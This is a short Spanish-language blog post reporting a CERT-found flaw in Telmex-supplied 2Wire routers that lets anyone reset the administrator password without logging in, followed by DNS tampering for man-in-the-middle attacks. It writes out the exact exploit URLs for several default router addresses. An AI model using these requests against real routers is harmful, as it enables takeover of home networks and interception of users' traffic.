Rayos!!!
Existe una vulnerabilidad impresionante en los dsl modems / routers que da telmex...
Hoy usmeando por la red encontre un articulo de la unam donde el cert encontro una vulnerabilidad terrible que permite cambiar la contraseña del router 2wire y no solo eso, si no modificar los dns para realizar un ataque man in the middle :S chetos!!!!
el ataque se realiza sobre las siguientes direcciones:
http://home/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://gateway.2wire.net/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://192.168.1.254/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://192.168.0.1/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://172.16.0.1/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
Aquí se pueden identificar los diversos intentos de llegar al ruteador para reestablecer la contraseña a “admin”. En el caso de nuestro equipo la URL que tuvo éxito fue la correspondiente a la IP 192.168.1.254.
Cabe señalar que el router contaba con una contraseña del sistema, establecida previamente, después de esta etapa del ataque la contraseña fue sobrescrita.
La página desde donde se sobrescribe la contraseña corresponde al wizard de configuración, por lo que al parecer el sistema no pide autenticación si se pasa como parámetro la nueva contraseña.
una vez dentro, modifica los parametros de dns y ejecuta una sustitucion de las paginas que desea redireccionar...
Fuente (con caché de google para que no haya errores por que quiten la pagina):
http://209.85.173.104/search?q=cache:BAaiyILcmygJ:www.seguridad.unam.mx/doc/%3Fap%3Darticulo%26id%3D196+xploit+gusanito+download&hl=es&ct=clnk&cd=17&gl=mx
Suscribirse a:
Enviar comentarios (Atom)
No hay comentarios:
Publicar un comentario